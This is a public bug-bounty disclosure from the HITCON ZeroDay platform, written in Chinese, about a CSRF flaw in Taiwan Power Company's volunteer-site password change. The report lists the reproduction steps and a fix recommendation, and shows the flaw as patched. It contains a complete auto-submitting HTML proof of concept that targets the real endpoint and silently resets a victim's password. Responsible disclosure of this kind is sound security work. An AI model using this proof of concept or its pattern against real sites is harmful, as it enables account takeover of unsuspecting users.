Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2022-00648
- 發信 Vendor: 台灣電力公司
- Title: [Bounty] 台灣電力公司 CSRF 重設使用者密碼
- Introduction: CSRF 重設使用者密碼
處理狀態
目前狀態
公開
Last Update : 2022/11/01
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2022/08/13 17:18:00 : 新提交 (由 ccoozzyy 更新此狀態)
- 2022/08/16 01:12:24 : 審核中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/10/31 10:53:24 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/10/31 22:01:46 : 確認已修補 (由 ccoozzyy 更新此狀態)
- 2022/11/01 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2022-00648
- 通報者:ccoozzyy (ccoozzyy)
- 風險:中
- 類型:跨站冒名請求 (Cross-Site Request Forgery, CSRF)
參考資料
攻擊者可經由該漏洞惡意操控使用者帳號進行惡意行為。
漏洞說明: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
防禦措施: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
漏洞說明: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
防禦措施: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://volunteer.taipower.com.tw/vms/mysite/vol_see.aspx?mode=pwd
敘述
- 登入受測目標 > 個人專區 > 修改密碼
- 可發現重設密碼時沒有 csrf token 且不需原始密碼即可重設新密碼
- 錄製重設密碼的 csrf poc
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://volunteer.taipower.com.tw/vms/mysite/vol_see.aspx?mode=pwd" method="POST"> <input type="hidden" name="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" value="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" /> <input type="hidden" name="__VIEWSTATEGENERATOR" value="601DFF1F" /> <input type="hidden" name="__SCROLLPOSITIONX" value="0" /> <input type="hidden" name="__SCROLLPOSITIONY" value="0" /> <input type="hidden" name="__EVENTVALIDATION" value="nMvQr8n71ASk3I4GM8Js8JtHxqayp8r9L3913Nb2rLALSa+4SW0pNaPLz3xweDCrxtRAjdyBHv/KCI+egBZGTd22y0frvKzji5jLit0brDeTSfbWVB9FxVGtizGZXGbKB+akvdxdbrJ7BkcrYLTj+B4lOc6vwdDuz+dYekNTZTKBGs2i" /> <input type="hidden" name="ctl00$ContentPlaceHolder2$txtPassword" value="csrfpassword" /> <input type="hidden" name="ctl00$ContentPlaceHolder2$txtConfirm" value="csrfpassword" /> <input type="hidden" name="ctl00$ContentPlaceHolder2$Button1" value="" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> - 重新登入,確保先前 session 已失效
- 受害者重新登入後,點選惡意連結,受害者便在不知情的情況下,修改了自己的密碼。
- 成功修改密碼
修補建議
修改密碼時需要輸入原始密碼來做確認
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。